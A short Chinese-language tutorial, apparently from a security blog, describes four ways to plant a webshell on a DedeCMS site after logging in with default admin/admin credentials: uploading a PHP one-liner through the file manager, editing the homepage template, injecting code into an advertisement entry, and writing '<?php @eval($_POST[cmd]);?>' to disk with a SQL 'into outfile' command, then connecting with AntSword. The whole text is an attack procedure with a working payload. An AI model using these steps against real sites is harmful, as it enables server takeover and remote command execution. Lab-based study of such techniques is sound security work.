dedecms(四种webshell姿势)

步骤一,登录网站

步骤二,进入后台

账号密码同为admin

姿势一,通过文件管理器上传WebShell

登陆到后台点击 【核心】--》【文件式管理器】【文件上传】 将准备好的一句话代码上传...OK

1.我们先创建一个1.php上传

2.上传之后我们双击1.php

3.我们进入1.php页面

4.蚁剑连接

姿势二,修改模板文件拿WebShell

与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下

1.我们修改一下index.htm,index.htm修改为php在第一段添加<?php phpinfo();?>点击保存

2.点击 【生成】【更新主页HTML】--》将主页位置修改为【/index.php】--》

点击 【生成静态】--》点击 【更新主页】 再次访问站点首页可发现变化...

3.访问/dede/../index.php

姿势三,后台任意命令执行拿WebShell

点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】

1.添加内容在广告内容添加一句话木马其他的谁便写

2.点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!

3.访问/plus/ad_js.php?aid=1

4.蚁剑连接

姿势四,通过sql命令行工具获取webshell

点击【系统】【sql命令行工具】--》多行命令中输入select '<?php @eval($_POST[cmd]);?>' into outfile '+路径+创建文件名

1.输入命令

2.点击确定

3.确认有记录

相关推荐
用户962377954481 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机4 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机4 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954486 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star6 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954489 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行5 天前
网络安全总结
安全·web安全
red1giant_star5 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透5 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全